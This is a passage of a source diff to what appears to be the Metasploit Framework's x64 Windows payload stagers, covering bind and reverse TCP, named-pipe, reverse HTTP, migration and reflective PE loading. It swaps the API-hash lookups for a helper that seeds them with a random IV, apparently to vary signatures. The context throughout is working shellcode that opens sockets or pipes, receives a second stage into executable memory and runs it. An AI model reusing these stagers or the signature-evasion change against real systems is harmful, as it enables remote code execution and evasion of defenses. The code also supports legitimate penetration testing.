r9, rsp ; lpNumberOfBytesRead push 0 ; alignment push 0 ; lpOverlapped - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')} call rbp ; ReadFile add rsp, 0x30 ; adjust stack pop rsi ; lpNumberOfBytesRead @@ -246,7 +246,7 @@ def asm_bind_named_pipe(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... ^ @@ -275,7 +275,7 @@ def asm_bind_named_pipe(opts={}) mov rdx, rbx ; lpBuffer push 0 ; lpOverlapped mov rcx, rdi ; hPipe - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')} call rbp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped) add rsp, 0x28 ; slight stack adjustment pop rdx ; lpNumberOfBytesRead @@ -294,14 +294,14 @@ def asm_bind_named_pipe(opts={}) pop r8 ; dwFreeType push 0 ; 0 to decommit whole block pop rdx ; dwSize - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')} call rbp ; VirtualFree(payload, 0, MEM_RELEASE) cleanup_file: ; clean up the pipe handle push rdi ; file handle pop rcx ; hFile - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + mov r10d, #{block_api_hash('kernel32.dll', 'CloseHandle')} call rbp ; CloseHandle(hPipe) jmp failure @@ -333,7 +333,7 @@ def asm_bind_named_pipe(opts={}) db "kernel32", 0x00 get_kernel32_name: pop rcx ; - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')} + mov r10d, #{block_api_hash('kernel32.dll', 'GetModuleHandleA')} call rbp ; GetModuleHandleA("kernel32") call get_exit_name @@ -341,7 +341,7 @@ def asm_bind_named_pipe(opts={}) get_exit_name: mov rcx, rax ; hModule pop rdx ; lpProcName - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')} + mov r10d, #{block_api_hash('kernel32.dll', 'GetProcAddress')} call rbp ; GetProcAddress(hModule, "ExitThread") xor rcx, rcx ; dwExitCode call rax ; ExitProcess(0) diff --git a/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb b/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb index fd138edc28691..f6a9891160cef 100644 --- a/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb +++ b/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb @@ -71,7 +71,7 @@ def asm_block_recv_rc4(opts={}) push 4 ; pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, &dwLength, 4, 0 ); add rsp, 32 ; we restore RSP from the api_call so we can pop off RSI next @@ -86,7 +86,7 @@ def asm_block_recv_rc4(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx,rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... ; mov rbx, rax ; rbx = our new memory address for the new stage @@ -102,7 +102,7 @@ def asm_block_recv_rc4(opts={}) mov r8, rsi ; length mov rdx, rbx ; the current address into our second stages RWX buffer mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, buffer, length, 0 ); add rsp, 32 ; restore stack after api_call diff --git a/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb b/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb index 5db3fc97f338e..09bb151515d3d 100644 --- a/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb +++ b/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb @@ -143,14 +143,14 @@ def asm_bind_tcp(opts={}) ; perform the call to LoadLibraryA... mov rcx, r14 ; set the param for the library to load - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp ; LoadLibraryA( "ws2_32" ) ; perform the call to WSAStartup... mov rdx, r13 ; second param is a pointer to this struct push 0x0101 ; pop rcx ; set the param for the version requested - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')} call rbp ; WSAStartup( 0x0101, &WSAData ); ; perform the call to WSASocketA... @@ -162,7 +162,7 @@ def asm_bind_tcp(opts={}) xor r8, r8 ; we do not specify a protocol inc rax ; mov rdx, rax ; push SOCK_STREAM - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')} call rbp ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 ); mov rdi, rax ; save the socket for later @@ -172,26 +172,26 @@ def asm_bind_tcp(opts={}) ; first 8 bytes as the rest aren't used) mov rdx, r12 ; set the pointer to sockaddr_in struct mov rcx, rdi ; socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')} + mov r10d, #{block_api_hash('ws2_32.dll', 'bind')} call rbp ; bind( s, &sockaddr_in, #{sockaddr_size} ); ; perform the call to listen... xor rdx, rdx ; backlog mov rcx, rdi ; socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')} + mov r10d, #{block_api_hash('ws2_32.dll', 'listen')} call rbp ; listen( s, 0 ); ; perform the call to accept... xor r8, r8 ; we set length for the sockaddr struct to zero xor rdx, rdx ; we dont set the optional sockaddr param mov rcx, rdi ; listening socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')} + mov r10d, #{block_api_hash('ws2_32.dll', 'accept')} call rbp ; accept( s, 0, 0 ); ; perform the call to closesocket... mov rcx, rdi ; the listening socket to close mov rdi, rax ; swap the new connected socket over the listening socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')} call rbp ; closesocket( s ); ; restore RSP so we dont have any alignment issues with the next block... @@ -213,7 +213,7 @@ def asm_block_recv(opts={}) push 4 ; pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, &dwLength, 4, 0 ); add rsp, 32 ; we restore RSP from the api_call so we can pop off RSI next @@ -226,7 +226,7 @@ def asm_block_recv(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... @@ -238,7 +238,7 @@ def asm_block_recv(opts={}) mov r8, rsi ; length mov rdx, rbx ; the current address into our second stages RWX buffer mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, buffer, length, 0 ); add rbx, rax ; buffer += bytes_received diff --git a/lib/msf/core/payload/windows/x64/block_api_x64.rb b/lib/msf/core/payload/windows/x64/block_api_x64.rb index f88d8db967c08..ca1d4ef24ec0c 100644 --- a/lib/msf/core/payload/windows/x64/block_api_x64.rb +++ b/lib/msf/core/payload/windows/x64/block_api_x64.rb @@ -10,12 +10,31 @@ module Msf ### module Payload::Windows::BlockApi_x64 + @block_api_iv = nil + + def block_api_iv(opts={}) + @block_api_iv ||= rand(0x100000000) + end + def asm_block_api(opts={}) - Rex::Payloads::Shuffle.from_graphml_file( + asm = Rex::Payloads::Shuffle.from_graphml_file( File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x64.graphml'), arch: ARCH_X64, name: 'api_call' ) + iv = opts.fetch(:block_api_iv) { block_api_iv } + # Patch the assembly to set the correct IV + # db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00 => mov r9d, + iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ') + unless asm.include?("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00") + raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})" + end + asm.sub!("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xb9, #{iv_bytes}") + end + + def block_api_hash(mod, func, opts={}) + iv = opts.fetch(:block_api_iv) { block_api_iv } + Rex::Text.block_api_hash(mod, func, iv: iv) end end diff --git a/lib/msf/core/payload/windows/x64/exitfunk_x64.rb b/lib/msf/core/payload/windows/x64/exitfunk_x64.rb index eb529f7080175..f273c6b486805 100644 --- a/lib/msf/core/payload/windows/x64/exitfunk_x64.rb +++ b/lib/msf/core/payload/windows/x64/exitfunk_x64.rb @@ -23,7 +23,7 @@ def asm_exitfunk(opts={}) asm << %Q^ push 0 ; pop rcx ; set the exit function parameter - mov ebx, 0x#{Msf::Payload::Windows.exit_types['seh'].to_s(16)} + mov ebx, #{block_api_hash('kernel32.dll', 'SetUnhandledExceptionFilter')} mov r10d, ebx ; place the correct EXITFUNK into r10d call rbp ; SetUnhandledExceptionFilter(0) push 0 ; @@ -34,7 +34,7 @@ def asm_exitfunk(opts={}) asm << %Q^ push 0 ; pop rcx ; set the exit function parameter - mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)} + mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')} mov r10d, ebx ; place the correct EXITFUNK into r10d call rbp ; call EXITFUNK( 0 ); ^ @@ -43,7 +43,7 @@ def asm_exitfunk(opts={}) asm << %Q^ push 0 ; pop rcx ; set the exit function parameter - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ; ExitProcess(0) ^ @@ -51,7 +51,7 @@ def asm_exitfunk(opts={}) asm << %Q^ push 300000 ; 300 seconds pop rcx ; set the sleep function parameter - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')} call rbp ; Sleep(30000) jmp exitfunk ; repeat ^ diff --git a/lib/msf/core/payload/windows/x64/migrate_common_x64.rb b/lib/msf/core/payload/windows/x64/migrate_common_x64.rb index 403d1eca23e6a..0968741347388 100644 --- a/lib/msf/core/payload/windows/x64/migrate_common_x64.rb +++ b/lib/msf/core/payload/windows/x64/migrate_common_x64.rb @@ -31,7 +31,7 @@ def generate(opts={}) #{generate_migrate(opts)} signal_event: mov rcx, qword [rsi] ; Event handle is pointed at by rsi - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + mov r10d, #{block_api_hash('kernel32.dll', 'SetEvent')} call rbp ; SetEvent(handle) call_payload: call qword [rsi+8] ; Invoke the associated payload diff --git a/lib/msf/core/payload/windows/x64/migrate_named_pipe_x64.rb b/lib/msf/core/payload/windows/x64/migrate_named_pipe_x64.rb index 0544571c0bce5..252eb38e4c9c7 100644 --- a/lib/msf/core/payload/windows/x64/migrate_named_pipe_x64.rb +++ b/lib/msf/core/payload/windows/x64/migrate_named_pipe_x64.rb @@ -32,7 +32,7 @@ def generate_migrate(opts = {}) mov rdi, qword [rsi+16] ; The duplicated pipe handle is in the migrate context. signal_pipe_event: mov rcx, qword [rsi] ; Event handle is pointed at by rsi - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + mov r10d, #{block_api_hash('kernel32.dll', 'SetEvent')} call rbp ; SetEvent(handle) call_pipe_payload: call qword [rsi+8] ; call the associated payload diff --git a/lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb b/lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb index 61d1e7c78a17c..655cdfa6b87ec 100644 --- a/lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb +++ b/lib/msf/core/payload/windows/x64/migrate_tcp_x64.rb @@ -38,13 +38,13 @@ def generate_migrate(opts={}) sub rsp, #{WSA_SIZE} ; alloc size, plus alignment (used later) mov r13, rsp ; save pointer to this struct sub rsp, 0x28 ; space for api function calls (really?) - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp ; LoadLibraryA('ws2_32') init_networking: mov rdx, r13 ; pointer to the wsadata struct push 2 pop rcx ; Version = 2 - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')} call rbp ; WSAStartup(Version, &WSAData) create_socket: xor r8, r8 ; protocol not specified @@ -55,7 +55,7 @@ def generate_migrate(opts={}) pop rdx ; SOCK_STREAM push 2 pop rcx ; AF_INET - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')} call rbp ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0) xchg rdi, rax ^ diff --git a/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb b/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb index 0ab9cac9f20f1..57fda89e06c0b 100644 --- a/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb +++ b/lib/msf/core/payload/windows/x64/reflective_pe_loader_x64.rb @@ -4,7 +4,6 @@ module Msf module Payload::Windows::ReflectivePELoader_x64 include Payload::Windows::BlockApi_x64 def asm_reflective_pe_loader_x64(opts) - prologue = '' if opts[:is_dll] == true prologue = %( @@ -30,7 +29,7 @@ def asm_reflective_pe_loader_x64(opts) mov rdx,[rsp] ; dwSize xor rcx,rcx ; lpAddress xchg rsp,rbp ; Swap shadow stack - mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d,#{block_api_hash('kernel32.dll', 'VirtualAlloc')} call api_call ; VirtualAlloc(lpAddress,dwSize,MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE) xchg rsp,rbp ; Swap shadow stack mov rdi,rax ; Save the new base address to rdi @@ -123,7 +122,7 @@ def asm_reflective_pe_loader_x64(opts) LoadLibraryA: ;mov rcx,rax ; Move the address of library name string to RCX xchg rbp,rsp ; Swap shadow stack - mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d,#{block_api_hash('kernel32.dll', 'LoadLibraryA')} call api_call ; LoadLibraryA(RCX) xchg rbp,rsp ; Swap shadow stack ret ; <- @@ -131,7 +130,7 @@ def asm_reflective_pe_loader_x64(opts) xchg rbp,rsp ; Swap shadow stack mov rcx,r13 ; Move the module handle to RCX as first parameter mov rdx,rax ; Move the address of function name string to RDX as second parameter - mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')} + mov r10d,#{block_api_hash('kernel32.dll', 'GetProcAddress')} call api_call ; GetProcAddress(ebx,[esp+4]) xchg rbp,rsp ; Swap shadow stack ret ; <- @@ -154,7 +153,7 @@ def asm_reflective_pe_loader_x64(opts) xor rdx,rdx ; lpBaseAddress xor r8,r8 ; hProcess xchg rbp,rsp ; Swap shadow stack - mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'FlushInstructionCache')} + mov r10d,#{block_api_hash('kernel32.dll', 'FlushInstructionCache')} call api_call ; FlushInstructionCache(0xffffffff,NULL,NULL); #{prologue} add r13,r12 ; Add the address of entry value to image base diff --git a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb index d6ddf74b7cb6b..bca088486fa98 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb @@ -240,7 +240,7 @@ def asm_reverse_http(opts={}) mov r14, 'wininet' push r14 ; Push 'wininet',0 onto the stack mov rcx, rsp ; lpFileName (stackpointer) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp internetopen: @@ -282,7 +282,7 @@ def asm_reverse_http(opts={}) xor r9, r9 ; lpszProxyBypass (NULL) push rbx ; stack alignment push rbx ; dwFlags (0) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetOpenA')} call rbp call load_server_host @@ -296,7 +296,7 @@ def asm_reverse_http(opts={}) push rbx ; dwFlags (0) push 3 ; dwService (3=INTERNET_SERVICE_HTTP) push rbx ; lpszPassword (NULL) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetConnectA')} call rbp ^ @@ -316,7 +316,7 @@ def asm_reverse_http(opts={}) pop rdx push #{proxy_user.length} ; dwBufferLength (proxy_user length) pop r9 - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call rbp ^ end @@ -332,7 +332,7 @@ def asm_reverse_http(opts={}) pop rdx push #{proxy_pass.length} ; dwBufferLength (proxy_pass length) pop r9 - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call rbp ^ end @@ -356,7 +356,7 @@ def asm_reverse_http(opts={}) push rax push rbx ; lplpszAcceptType (NULL) push rbx ; lpszReferer (NULL) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} + mov r10d, #{block_api_hash('wininet.dll', 'HttpOpenRequestA')} call rbp prepare: @@ -385,7 +385,7 @@ def asm_reverse_http(opts={}) mov r8, rsp ; lpBuffer (pointer to flags) push 4 pop r9 ; dwBufferLength (4 = size of flags) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call rbp xor r8, r8 ; dwHeadersLen (0) @@ -414,14 +414,14 @@ def asm_reverse_http(opts={}) xor r9, r9 ; lpszVersion (NULL) push rbx ; stack alignment push rbx ; dwOptionalLength (0) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} + mov r10d, #{block_api_hash('wininet.dll', 'HttpSendRequestA')} call rbp test eax, eax jnz allocate_memory set_wait: mov rcx, #{retry_wait} ; dwMilliseconds - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')} call rbp ; Sleep( dwMilliseconds ); ^ @@ -449,7 +449,7 @@ def asm_reverse_http(opts={}) asm << %Q^ failure: ; hard-coded to ExitProcess(whatever) for size - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ; ExitProcess(whatever) ^ end @@ -472,7 +472,7 @@ def asm_reverse_http(opts={}) push 4 pop r8 ; dwNumberOfBytesToRead (4 bytes) mov rcx, rsi ; hFile (request handle) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetReadFile')} call rbp test eax, eax ; did the download fail? jz failure @@ -485,7 +485,7 @@ def asm_reverse_http(opts={}) push 0x40 pop r9 ; flProtect (0x40=PAGE_EXECUTE_READWRITE) mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ;download stage download_prep: @@ -497,7 +497,7 @@ def asm_reverse_http(opts={}) mov r8, rax ; dwNumberOfBytesToRead (incoming stage size) mov rdx, rbx ; lpBuffer (pointer to mem) mov r9, rdi ; lpdwNumberOfByteRead (stack pointer) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetReadFile')} call rbp add rsp, 32 ; clean up reserved space test eax, eax ; did the download fail? @@ -515,7 +515,7 @@ def asm_reverse_http(opts={}) mov r9, rdx ; flProtect (0x40=PAGE_EXECUTE_READWRITE) shl edx, 16 ; dwSize mov r8, 0x1000 ; flAllocationType (0x1000=MEM_COMMIT) - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp download_prep: @@ -529,7 +529,7 @@ def asm_reverse_http(opts={}) mov rdx, rbx ; lpBuffer (pointer to mem) mov r8, 8192 ; dwNumberOfBytesToRead (8k) mov r9, rdi ; lpdwNumberOfByteRead (stack pointer) - mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + mov r10d, #{block_api_hash('wininet.dll', 'InternetReadFile')} call rbp add rsp, 32 ; clean up reserved space diff --git a/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb b/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb index b1706a03bc15c..bebf76919bf1d 100644 --- a/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb @@ -125,7 +125,7 @@ def asm_reverse_named_pipe(opts={}) xor r9, r9 ; lpSecurityAttributes xor r8, r8 ; dwShareMode mov rdx, 0xC0000000 ; dwDesiredAccess(GENERIC_READ|GENERIC_WRITE) - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} + mov r10d, #{block_api_hash('kernel32.dll', 'CreateFileA')} call rbp ; CreateFileA(...) ; check for failure @@ -145,7 +145,7 @@ def asm_reverse_named_pipe(opts={}) else asm << %Q^ failure: - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ^ end @@ -170,7 +170,7 @@ def asm_reverse_named_pipe(opts={}) push 0 ; lpOverlapped mov rdx, rsi ; lpBuffer mov rcx, rdi ; hFile - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')} call rbp ; ReadFile(...) ^ @@ -199,7 +199,7 @@ def asm_reverse_named_pipe(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... mov rbx, rax ; rbx = our new memory address for the new stage @@ -219,7 +219,7 @@ def asm_reverse_named_pipe(opts={}) mov rdx, rbx ; lpBuffer push 0 ; lpOverlapped mov rcx, rdi ; hFile - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')} call rbp ; ReadFile(...) add rsp, 0x28 ; slight stack adjustment ^ @@ -239,14 +239,14 @@ def asm_reverse_named_pipe(opts={}) pop r8 ; dwFreeType push 0 ; 0 pop rdx ; dwSize - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')} call rbp ; VirtualFree(payload, 0, MEM_DECOMMIT) cleanup_file: ; clean up the socket push rdi ; file handle pop rcx ; hFile - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + mov r10d, #{block_api_hash('kernel32.dll', 'CloseHandle')} call rbp ; and try again diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb b/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb index 2b7ac932bb185..8af5528c86fe5 100644 --- a/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb @@ -74,7 +74,7 @@ def asm_block_recv_rc4(opts={}) push 4 ; pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, &dwLength, 4, 0 ); ^ @@ -101,7 +101,7 @@ def asm_block_recv_rc4(opts={}) pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx,rcx ; NULL as we dont care where the allocation is. - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... ; mov rbx, rax ; rbx = our new memory address for the new stage @@ -117,7 +117,7 @@ def asm_block_recv_rc4(opts={}) mov r8, rsi ; length mov rdx, rbx ; the current address into our second stages RWX buffer mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, buffer, length, 0 ); add rsp, 32 ; restore stack after api_call ^ @@ -137,14 +137,14 @@ def asm_block_recv_rc4(opts={}) pop r8 ; dwFreeType push 0 ; 0 pop rdx ; dwSize - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')} call rbp ; VirtualFree(payload, 0, MEM_COMMIT) cleanup_socket: ; clean up the socket push rdi ; socket handle pop rcx ; s (closesocket parameter) - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')} call rbp ; and try again diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb b/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb index b51cd95a29d5c..a397906a79b20 100644 --- a/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb @@ -120,14 +120,14 @@ def asm_reverse_tcp(opts={}) ; perform the call to LoadLibraryA... mov rcx, r14 ; set the param for the library to load - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call rbp ; LoadLibraryA( "ws2_32" ) ; perform the call to WSAStartup... mov rdx, r13 ; second param is a pointer to this struct push 0x0101 ; pop rcx ; set the param for the version requested - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')} call rbp ; WSAStartup( 0x0101, &WSAData ); ; stick the retry count on the stack and store it @@ -144,7 +144,7 @@ def asm_reverse_tcp(opts={}) mov rdx, rax ; push SOCK_STREAM inc rax ; mov rcx, rax ; push AF_INET - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')} call rbp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); mov rdi, rax ; save the socket for later @@ -154,7 +154,7 @@ def asm_reverse_tcp(opts={}) pop r8 ; pop off the third param mov rdx, r12 ; set second param to pointer to sockaddr struct mov rcx, rdi ; the socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + mov r10d, #{block_api_hash('ws2_32.dll', 'connect')} call rbp ; connect( s, &sockaddr, 16 ); test eax, eax ; non-zero means failure @@ -173,7 +173,7 @@ def asm_reverse_tcp(opts={}) else asm << %Q^ failure: - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + mov r10d, #{block_api_hash('kernel32.dll', 'ExitProcess')} call rbp ^ end @@ -203,7 +203,7 @@ def asm_block_recv(opts={}) push 4 ; pop r8 ; length = sizeof( DWORD ); mov rcx, rdi ; the saved socket - mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + mov r10d, #{block_api_hash('ws2_32.dll', 'recv')} call rbp ; recv( s, &dwLength, 4, 0 ); ^ @@ -228,7 +228,7 @@ def asm_block_recv(opts={}) pop r8 ; MEM_COMMIT 